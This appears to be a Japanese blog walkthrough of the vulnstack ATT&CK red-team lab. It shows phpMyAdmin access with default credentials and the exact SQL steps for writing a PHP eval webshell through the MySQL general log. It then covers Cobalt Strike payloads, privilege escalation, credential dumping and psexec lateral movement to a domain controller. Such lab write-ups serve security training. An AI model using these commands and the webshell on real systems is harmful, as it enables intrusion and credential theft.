banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

ATT&CKレッドチーム評価実戦ターゲット-1

概要#

靶場は:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

シンプルな靶場で、もともとは学生の評価に使われる予定でしたが、実際には使用されず、横方向のドメイン侵入も Cobalt Strike の psexec モジュールを使用しただけで、主な内容は侵入のプロセスに慣れることです。

靶場には多くの脆弱性が再現できないものもあり、環境にいくつかの問題がありますが、全体のプロセスには問題ありません。

環境構築#

3D グラフィックスの加速を無効にする必要があります。さもなければ、仮想マシンを起動できません。

image

トポロジー図は以下の通りです:

image

ネットワーク設定は以下の通りで、VMnet2 と VMnet8 を使用します:

image

Web サーバー(VM1) - Win7(デュアル NIC、NAT モード + vmnet2(ホスト専用))

image

IP:192.168.111.128 と 192.168.52.143

phpstudy を起動します。

image

DNS は DC を指します。

image

Win2008 DC(VM3)

IP:192.168.52.138

image

Win03 ドメインメンバー(VM2)

IP:192.168.52.141

image

現在のドメインを確認します。

image

侵入プロセス#

情報収集#

nmap ポートスキャン#

image

image

御剣スキャン#

image

ディレクトリスキャン#

image

phpinfo ページ

image

phpmyadmin ログイン#

パスワード:root/root

image

phpmyadmin getshell#

ログを通じて getshell

ログが記録されているか、ログの保存場所を確認します:SHOW VARIABLES LIKE "general_log%";
image

ログを有効にします:set global general_log='on';
有効になっているか確認します:SHOW VARIABLES LIKE "general_log%"

image

書き込むログファイルを悪意のあるファイルに設定する必要があります。まず、ウェブサイトのディレクトリを見つける必要があります。

image

ログパスを設定します:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

設定成功

image

準備が整ったら、マルウェアを書き始めます。SQL 文を使ってクエリを実行するだけです。

select "<?php @eval($_POST[cmd]);?>";

image

Webshell にアクセス:
http://192.168.111.128/ss.php

image

AntSword 接続:

image

ウェブサイトの 80 番ポートは yxcms です。

image

バックエンドにログインし、同様に SQL 文を実行できます。

image

Webshell で IP アドレスを確認します。

image

デュアル NIC を発見しました。

cs 起動#

Cobalt Strike に接続して操作します。

サーバー

image

クライアント

リスナーを設定します。

image

image

ペイロードを生成します。

image

ペイロードを AntSword にアップロードして実行します。

image

exe を実行し、cs に接続します。

image

スリープ 0

image

シェル whoami

image

権限昇格#

cs 上で getsystem を使用して一括昇格し、system 権限を取得します。

image

内部ネットワーク情報収集#

image

ターゲットをクリックすると、3 台のマシンが見つかります。開いていない場合は、ポートスキャンを行うと表示されます。

image

dumphash

image

平文パスワードを取得します。

image

横方向移動#

パスワードを取得した後、psexec を使用して横方向に移動します。ここでは、3 台のマシンのパスワードがすべて同じであるため、異なる場合は smb を通じて横方向に移動できません。

image

psexec64 を選択し、64 ビットを使用します。

image

image

ドメインコントロールサーバーを取得します。

image

image

image

同様の方法で 141、Win2003 のドメインメンバー機を制御します。

image

psexec を選択する必要があります。32 ビットを使用します。

image

IP を確認します。

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。